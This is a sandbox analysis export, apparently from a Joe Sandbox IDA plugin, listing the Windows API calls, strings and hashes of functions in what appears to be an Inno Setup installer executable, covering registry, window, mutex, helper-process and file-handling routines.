                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4), ref: 0041CAE4
                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?), ref: 0041CAED
                                                                            • 73A08830.GDI32(0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CAFC
                                                                            • 73A022A0.GDI32(0041CDAC,0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CB05
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CB1E
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CB35
                                                                            • 73A14D40.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB7A,?,?,00000000), ref: 0041CB51
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CB5E
                                                                            • DeleteDC.GDI32(00000000), ref: 0041CB74
                                                                              • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                            • String ID:
                                                                            • API String ID: 2377543522-0
                                                                            • Opcode ID: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                            • Instruction ID: 7128b10ae0d2f5501f58bad1f60f679124a592cf14607d549707b49f1954e982
                                                                            • Opcode Fuzzy Hash: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                            • Instruction Fuzzy Hash: 5961FC71A44609ABDF10EBE5DC86FAFB7B8EF48704F10446AF504E7281C67CA9418B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DEF6
                                                                            • GetVersion.KERNEL32(00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF13
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF2C
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DF32
                                                                            • FreeSid.ADVAPI32(00000000,0042E0A7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E09A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                            • API String ID: 1717332306-1888249752
                                                                            • Opcode ID: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                            • Instruction ID: b47b297bded1d11ddf8dbbdf8866b420117faccba79691f7cf002b7c56945d2e
                                                                            • Opcode Fuzzy Hash: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                            • Instruction Fuzzy Hash: 0E51B471B44629AEDB10EAE69C42F7F77ECEB09304F94447BB500E7282C5BC9905866D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000,004928CB,?,00000000), ref: 0049226B
                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000), ref: 0049227E
                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000), ref: 0049228E
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004922AF
                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000), ref: 004922BF
                                                                              • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                            • API String ID: 2000705611-3672972446
                                                                            • Opcode ID: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                            • Instruction ID: 3aaa1206ea96c942a1dc7cc704d64c74666df5688c5e5e951628029b4c51e49f
                                                                            • Opcode Fuzzy Hash: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                            • Instruction Fuzzy Hash: A791C330A04204BFDF11EBA5C956BAF7BA4EB49314F924477F800AB392D6BC9C05CB19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00458CC6,?,?,?,?,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458B78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                            • API String ID: 1452528299-1593206319
                                                                            • Opcode ID: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                            • Instruction ID: c0b81f7498e5b7e500974e5393cbc04c1f71ed909e083ee47f99453e8a5d0863
                                                                            • Opcode Fuzzy Hash: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                            • Instruction Fuzzy Hash: 11616C30B002445BDB11EB6998827AE7BA5AB49719F50846FF801EB383DF789D09C769
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B333
                                                                            • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B33D
                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B34F
                                                                            • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B366
                                                                            • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B372
                                                                            • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B39F
                                                                            • 73A0A480.USER32(00000000,00000000,0041B3D2,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                            • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                            • DeleteDC.GDI32(?), ref: 0041B449
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                            • String ID:
                                                                            • API String ID: 3135053572-0
                                                                            • Opcode ID: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                            • Instruction ID: ef99a8f9a6f00624a9096b2aeeb37702e3b70ceb3a8cbf3cb68c8f3869cb2bd7
                                                                            • Opcode Fuzzy Hash: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                            • Instruction Fuzzy Hash: 1541D071E40619AFDF10DAE9D846FEFB7BCEF08704F104466B614FB281C67869408BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046E55B
                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046E64E
                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0046E664
                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046E689
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                            • API String ID: 971782779-3668018701
                                                                            • Opcode ID: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                            • Instruction ID: dad63e880d71d64191cbb6a8ee4696ca6eb4502e54dc837f5c65c8de11b949a7
                                                                            • Opcode Fuzzy Hash: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                            • Instruction Fuzzy Hash: A5D13474A00249AFDB01EF99D885BDEBBF5AF08314F54402AF800B7391D778AE45CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,?,00000000,?,00000000,0045334D,?,00458E8E,00000003,00000000,00000000,00453384), ref: 004531CD
                                                                              • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                            • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453251
                                                                            • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453280
                                                                            Strings
                                                                            • RegOpenKeyEx, xrefs: 00453150
                                                                            • , xrefs: 0045313E
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004530EB
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453124
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                            • API String ID: 2812809588-1577016196
                                                                            • Opcode ID: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                            • Instruction ID: 9b4ba10c22eae4ee7854298b287fdc99132420248117da062c6f054c990cd466
                                                                            • Opcode Fuzzy Hash: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                            • Instruction Fuzzy Hash: 90911371D04608ABDB11DFA5C941BDEB7B9EB48346F50407BF900F7282D6789F098B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?), ref: 00456E87
                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00456EA3
                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00456EB1
                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00456EC2
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F09
                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F25
                                                                            Strings
                                                                            • Helper process exited, but failed to get exit code., xrefs: 00456EFB
                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00456EEF
                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00456E79
                                                                            • Helper isn't responding; killing it., xrefs: 00456E93
                                                                            • Helper process exited., xrefs: 00456ED1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                            • API String ID: 3355656108-1243109208
                                                                            • Opcode ID: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                            • Instruction ID: e3dcae7ee27b0c74354dd39b82ec863519094067a73f9fae9ec07b4aeacd6428
                                                                            • Opcode Fuzzy Hash: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                            • Instruction Fuzzy Hash: 09217171A047019AC720EB79D44575BB6E49F08309F41CC2FF99ACB283D77CE8488B2A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC1C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452E8F
                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452FCB
                                                                              • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DA7
                                                                            • RegCreateKeyEx, xrefs: 00452E03
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DD7
                                                                            • , xrefs: 00452DF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                            • API String ID: 2481121983-1280779767
                                                                            • Opcode ID: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                            • Instruction ID: bd46e7fedae0378ea69e291eeb16b1e61bf49070ab8af015702d395f50882908
                                                                            • Opcode Fuzzy Hash: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                            • Instruction Fuzzy Hash: D281F076A00209AFDB00DFD5D941BEEB7B9EB49305F50442BF900F7282D778AA05DB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00452240: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                              • Part of subcall function 00452240: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00490BED
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00490D41), ref: 00490C0E
                                                                            • CreateWindowExA.USER32(00000000,STATIC,00490D50,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00490C35
                                                                            • SetWindowLongA.USER32(?,000000FC,004903C8), ref: 00490C48
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC,00490D50), ref: 00490C78
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00490CEC
                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000), ref: 00490CF8
                                                                              • Part of subcall function 00452590: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                            • 73A15CF0.USER32(?,00490D1B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC), ref: 00490D0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                            • API String ID: 170458502-2312673372
                                                                            • Opcode ID: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                            • Instruction ID: 92ce551481e6a002572db3822da7cd140e35cf2137eba75a76cf686200e2178a
                                                                            • Opcode Fuzzy Hash: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                            • Instruction Fuzzy Hash: EE414371A44208AFDF10EBA5DC42F9E7BF8EB09704F514576F510F7291D6799E008BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0042EA88
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EA9C
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EAA9
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EAB6
                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042EB02
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042EB40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                            • API String ID: 2610873146-3407710046
                                                                            • Opcode ID: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                            • Instruction ID: 33f08c3eecf59c1efe6da1d62cafc2865f84f18ea85c38477b96760789069036
                                                                            • Opcode Fuzzy Hash: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                            • Instruction Fuzzy Hash: 9721D4B67017246FD300DA69DC81F3B7B98DB84714F09462AF945DB381DA78EC008A59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0045EEFC
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0045EF10
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0045EF1D
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0045EF2A
                                                                            • GetWindowRect.USER32(?,00000000), ref: 0045EF76
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0045EFB4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                            • API String ID: 2610873146-3407710046
                                                                            • Opcode ID: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                            • Instruction ID: 495c241bec279fa6e8d852d727b900aa08f5c3bdd79c5966852e86187c859b95
                                                                            • Opcode Fuzzy Hash: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                            • Instruction Fuzzy Hash: EE21C2B2205604BFD2049669CC81F3B7799DB84711F09452AFD44DB3C2DA78ED098A99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00457207,?,00000000,0045726A,?,?,021E3858,00000000), ref: 00457085
                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570E2
                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570EF
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045713B
                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000), ref: 00457161
                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000), ref: 00457168
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                            • API String ID: 2182916169-3012584893
                                                                            • Opcode ID: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
